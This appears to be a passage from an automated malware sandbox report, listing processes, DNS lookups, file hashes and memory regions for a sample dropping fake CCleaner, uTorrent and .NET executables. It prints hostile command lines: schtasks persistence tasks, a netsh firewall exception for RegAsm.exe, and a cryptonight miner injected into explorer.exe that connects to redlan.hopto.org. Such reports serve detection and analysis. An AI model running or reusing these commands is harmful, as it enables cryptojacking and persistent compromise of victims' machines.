PID 5092 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 5092 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 5092 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 5092 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 5092 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2780 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2780 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2780 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2780 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2780 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2780 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2780 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2816 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2816 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2816 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2816 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2816 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2816 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2816 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2816 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 1504 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\SysWOW64\netsh.exe
PID 1504 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\SysWOW64\netsh.exe
PID 1504 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\SysWOW64\netsh.exe
PID 2352 wrote to memory of 4592 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2352 wrote to memory of 4592 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2352 wrote to memory of 4592 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe

"C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"

C:\Users\Admin\AppData\Local\Temp\cleaner.exe

"C:\Users\Admin\AppData\Local\Temp\cleaner.exe"

C:\Users\Admin\AppData\Local\Temp\Torrent.exe

"C:\Users\Admin\AppData\Local\Temp\Torrent.exe"

C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

"C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"

C:\Users\Admin\AppData\Local\Temp\Project1.exe

"C:\Users\Admin\AppData\Local\Temp\Project1.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3316 -ip 3316

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3316 -s 1088

C:\Windows\SysWOW64\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe"

C:\Users\Admin\AppData\Local\Temp\NetFramework.exe

"C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"

C:\Users\Admin\AppData\Local\Temp\NetFramework.exe

"C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50

C:\Windows\explorer.exe

C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp

Files

C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe

MD5 d18ce77a75017e627de41febd9e289ee
SHA1 012a66d318e8294492accc0beca42c9999b68146
SHA256 7d6e025a8d510b10988375f020c60efec7d6ee77367ed8879e8a3b1172a5efd4
SHA512 c5f24a7f7c9e8ed552aa6402539171551851afd86b85b28e4018c2c8cd38c4ed22cb726eec5f750d90a25343e61e1cc97c62b1a486cbac6e04b777886411c86f

C:\Users\Admin\AppData\Local\Temp\cleaner.exe

MD5 b4bae96dc11834b254ec53b2cdba13aa
SHA1 7b67438093eb1860237bf88aefebf56bb9333aba
SHA256 bcd5d4c36ee50d99d6ae1aa91c0c12569f711d37e7b59a3483f413c7c2b68142
SHA512 ea2b93b7f9046e931812ab8efd364502d936ad28fa174f1c63d79fa46bedc5bbbf3476c0b551e40ae75bf82cbb3c5a107e41b49aeb6cd0b5fc294a5813519eda

C:\Users\Admin\AppData\Local\Temp\Torrent.exe

MD5 cedb1319e9cbd45f4cc69e58699009d3
SHA1 ef66c3f343744a6afa9b9955d65e6ccaba41c27e
SHA256 5f61384bf58773755f2ae7500b1e24b1394df6b69c80d240ad0731842c908808
SHA512 bb204c60f138e4a341a6eafed2b39409105805e391bea572e5df0d8f0a24e5af8e2d2da9fedb26460adef321079efbe8443fa08bb0e0b3702e6478452bb26bd8

memory/2776-34-0x0000000000940000-0x0000000001026000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

MD5 7e962cb55be5963163d4f6a21100950c
SHA1 f58ad41f8c86b9cffc7d66f4991162f731926d1d
SHA256 1e6af101af20d01594ae2d42d066198b7e226546e6cd9f37594783618e758968
SHA512 757996c16752816850607d4ef1cb12e002133c73a2c431ef735aa56f01bf33a6ea4e2725556e2a53a4603552348477fa72c286afdf1fd605ea5f8671b2486b3a

memory/5064-45-0x0000000000B30000-0x0000000001216000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Project1.exe

MD5 1166591fc5f77c463d176bcca574efff
SHA1 35d710b8983945aaf8c39d289fd6c73ed1f00b65
SHA256 a51c6e6c19be022dcbf235a9bebeab1b73292e2ee40b48653e80b96f10aa9bad
SHA512 751f5cf2cc5316ddbbba2805ac9c3fee24d80a85c92587c85ac80a2033aaeef96f58bcb5053584bcea7ad8fcb538183da9d29360f44666e1bfd3bdf0f08caa97

memory/3316-56-0x0000000002C90000-0x0000000002C91000-memory.dmp

memory/3316-57-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-76-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-88-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-96-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-95-0x00000000037B0000-0x00000000037B1000-memory.dmp

memory/3316-94-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-93-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-92-0x0000000002D50000-0x0000000002D51000-memory.dmp

memory/3316-91-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-90-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-89-0x0000000002D40000-0x0000000002D41000-memory.dmp

memory/4564-98-0x0000000000400000-0x000000000040C000-memory.dmp

memory/3316-87-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-86-0x0000000002D30000-0x0000000002D31000-memory.dmp

memory/3316-85-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-84-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/768-102-0x0000000000160000-0x00000000001B6000-memory.dmp

memory/3316-83-0x0000000002D20000-0x0000000002D21000-memory.dmp

memory/3316-82-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/768-107-0x0000000000A30000-0x0000000000A40000-memory.dmp

memory/768-108-0x0000000004C00000-0x0000000004CAE000-memory.dmp

memory/768-109-0x0000000004BC0000-0x0000000004BE8000-memory.dmp

memory/3316-81-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-97-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-114-0x00000000037D0000-0x00000000037D1000-memory.dmp

memory/3316-113-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-112-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-111-0x00000000037C0000-0x00000000037C1000-memory.dmp

memory/3316-122-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-115-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/768-110-0x0000000004E50000-0x0000000004EEC000-memory.dmp

memory/3316-80-0x0000000002D10000-0x0000000002D11000-memory.dmp

memory/3316-79-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-78-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-77-0x0000000002D00000-0x0000000002D01000-memory.dmp

memory/3316-75-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-74-0x0000000002CF0000-0x0000000002CF1000-memory.dmp

memory/3316-73-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-72-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-71-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

memory/3316-69-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-68-0x0000000002CD0000-0x0000000002CD1000-memory.dmp

memory/3316-67-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-65-0x0000000002CC0000-0x0000000002CC1000-memory.dmp

memory/3316-70-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-66-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-62-0x0000000002CB0000-0x0000000002CB1000-memory.dmp

memory/3316-61-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-60-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-59-0x0000000002CA0000-0x0000000002CA1000-memory.dmp

memory/3316-64-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-63-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-58-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-123-0x0000000003800000-0x0000000003801000-memory.dmp

memory/3316-121-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-120-0x00000000037F0000-0x00000000037F1000-memory.dmp

memory/3316-119-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-118-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/3316-117-0x00000000037E0000-0x00000000037E1000-memory.dmp

memory/3316-116-0x00000000028C0000-0x0000000002A00000-memory.dmp

memory/768-131-0x00000000055A0000-0x0000000005B44000-memory.dmp

memory/768-137-0x0000000005520000-0x0000000005586000-memory.dmp

memory/768-136-0x00000000051D0000-0x0000000005262000-memory.dmp

memory/768-141-0x0000000006230000-0x0000000006248000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NetFramework.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/768-146-0x00000000063C0000-0x00000000063D6000-memory.dmp

memory/768-147-0x00000000069F0000-0x00000000069FA000-memory.dmp

memory/5092-170-0x0000000003690000-0x0000000003698000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NetFramework.exe.log

MD5 45bc08b96d0a42db5f33963f68aeff54
SHA1 2cd2c242cc5c0303c3752519da1c783d8c669c7a
SHA256 5bc8d756a311152bb5e4b40aa4e2e3a61afbd4f685382b26835b03a0b793fcb7
SHA512 4c1e96568a8995ce50814685a24eb20f573c5501ce20cb02982bba0674ff41f98601215339c46378de0198a4c582c8e28316e8d6d0ffeacff7cfb5d35109d1a9

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

MD5 bcf5880698e760a8e7eff7534b5f763f
SHA1 da463d735f08cd5fb49dd5587fcfffbd2def8a91
SHA256 98bb7ef967aff495344931b58c214de7449c02f10696d627fdba813b242cd854
SHA512 6f346038394b850f14b563dfb9b1378384e09b535783705719777f46e3aabbef82368ffbd394d15b0454137905ba0fa91200b16fc8f0d41c40f14aa37e53f87d

C:\Users\Admin\secinit\sdchange.exe

MD5 7c9ba3bbb5ad2b06bcfce9b114d0f258
SHA1 f1789201e54b8f0d0b205c2cbde9e5de6cfe3a5c
SHA256 3a52a8f1550850b66dba1646a0169f261b636ed7f62cdf748a4b574f5b65e0b4
SHA512 dc39b54488158125aa6e2a74ebe9ecdb8044a1d5cb6b1404decfa9e2b90f64c99a2515010444b59f619fa6d2fbc8db7e7f3d6362af7b030ad7ff6bebc7bd2f96

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

MD5 222d68d687ca102310b3887eae8963ec
SHA1 b0966d0e81b63d68e2dfa13131d5b0556921a8a4
SHA256 07f121eab7e49a7a7d8002407b310011555b719777ad1468eac6db5d0c5850aa
SHA512 4e3bf9a7168d42f911d2ecb4bc1556dfabea648e4595dbcae18518076d2994069a1d379aa4ff531f7b3870faf8d4431d371174afcb76884353e92a94221553eb

memory/4904-251-0x0000000000400000-0x0000000000456000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log

MD5 9f893d94b017a0684012d50319c9ffbe
SHA1 140cc2cb6b2520ba4f9a1f666a5f679853472793
SHA256 8a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec
SHA512 4b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

MD5 6832f1ed5b3043154d3b685cce8c8b87
SHA1 4c42ec0798aaad1fe7d7650e9e7c00bf978658b3
SHA256 fa9d245a676b1e7c3ebd887c5e0d1655ddcb7faf632197796dbb61eaf5131061
SHA512 cb847efcab6c67bbe0677984a6421befb559a32a33ea814d7acef539365f03cd14715e21e5d02b8d770abd73e74f8df108225aa1eb7dc8caca1723de15135584

memory/3936-285-0x0000000000560000-0x00000000005B6000-memory.dmp